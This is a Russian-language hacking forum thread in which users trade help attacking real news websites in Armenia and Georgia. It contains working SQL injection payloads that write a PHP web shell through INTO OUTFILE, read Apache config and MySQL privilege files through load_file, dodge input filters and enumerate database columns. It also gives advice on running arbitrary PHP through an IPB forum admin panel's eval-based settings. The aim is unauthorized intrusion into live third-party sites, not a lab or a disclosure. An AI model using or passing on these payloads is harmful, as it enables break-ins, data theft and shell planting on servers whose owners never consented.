Вопросы по уязвимостям

[Tigger]

Цитата:

Сообщение от aze

pomoqite shell zalivat..

http://news.***.am/index.php?lg=ru&country=0&view_id=-4313+union+select+1,2,3,4,'evilcode',6,7,8,9,+10+i nto+outfile+'/полный/путь/к/файлу/шелл.php'--+

Осталось найти полный путь к сайту и диру, на которую есть права.

Полный путь можно найти в конфигах апача, к примеру.

[avenu]

2 aze
вот путь к конфигу

Код:

http://news.***.am/index.php?lg=ru&country=0&view_id=-4313 union select 1,2,3,load_file('/etc/httpd/conf/httpd.conf'),file_priv,6,7,8,9,10 from mysql.user-- 9

но он нам ничего толкового не дает, можно попробовать поперебирать инклудящиеся конфиги, примерно таким образом /etc/httpd/conf/conf.d/news.conf /etc/httpd/conf/conf.d/news.zvartnots.conf и т.д.
а лучше как-либо заставить серв выплюнуть ошибку с полным путем, либо в идеале пхпинфо найти, я посканил сайт, чет ниче нету подобного =( ну ты попробуй, может у тебя что получится

[Nightmare]

Подскажите, как выполнить php код в админке IPB форума?
Уже всё перерыл, только поверхносное описание нашёл, но нигде не работает как бы я не пытался...
По идее выполнение кода происходит при добавлении новой настройки с ним, но уже час мучаюсь так и ничё не выходит, кто знает как правильно, подскажите плз.

Вот скрин:
http://s016.radikal.ru/i335/1012/ea/8cf0bc3d781d.jpg
Тут мы добавляем настройку (1), далее пишем свой php код, например phpinfo(); (2) я пробовал и <?php phpinfo(); ?> далее жмём на кнопку "создать новую настройку" и ничё не происходит, может быть что то ещё надо? Будьте добры подскажите.

[Pashkela]

точно не помню, если IPB 2.xxx, то по идее надо просто потом ЕЩЕ раз зайти в эту настройку (тыцкнуть), найдя её по названию в списке настроек. Это раз.

<? и ?> там не нужны, т.к. eval. Это два.

Ну и если не добавляется новая настройка, то можно РЕДАКТИРОВАТЬ уже имеющуюся, какую-нибудь левую и редко использующуюся, так же просто вписав туда php-код без <? и ?>. Это типо три

PS: При добавлении настроек лучше заполнить ВСЕ предложенные поля, вполне вероятно где-то ниже, по английски, мелким шрифтом пишет чонить : "Вы не указали название настройки, вам пофигу, а нам приятно ^_^"

[Nightmare]

Ковырять все параметры вслепую я и сам знаю, к сожалению.
Мне бы конкретику от людей кто знает\недавно делал.

[aze]

Цитата:

http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=1129

pomoqite raskrutit sqli..filter est tam..

[aka_zver]

Цитата:

Сообщение от aze

pomoqite raskrutit sqli..filter est tam..

http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=1129+/*!and+mid(version(),1,1)=5*/

[aze]

blind ?
druqoy varianti neto ?

ili kto znaet blind sqli pomoqite pojalusta dalse raskrutit..

[v1d0q]

Код:

http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=-1129+union%0aselect+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16--+

[aze]

Цитата:

http://www.***.ge/index.php?lang_id=ENG&sec_id=24&info_id=-1129+union%0Aselect+1,2,3,4,5,group_concat(0x3a,co lumn_name),7,8,9,10,11,12,13,14,15,16+from+informa tion_schema.columns+where+table_name=sdsaffa--+

i vot zdes filteruetsya to4no =..kak oboyti evo..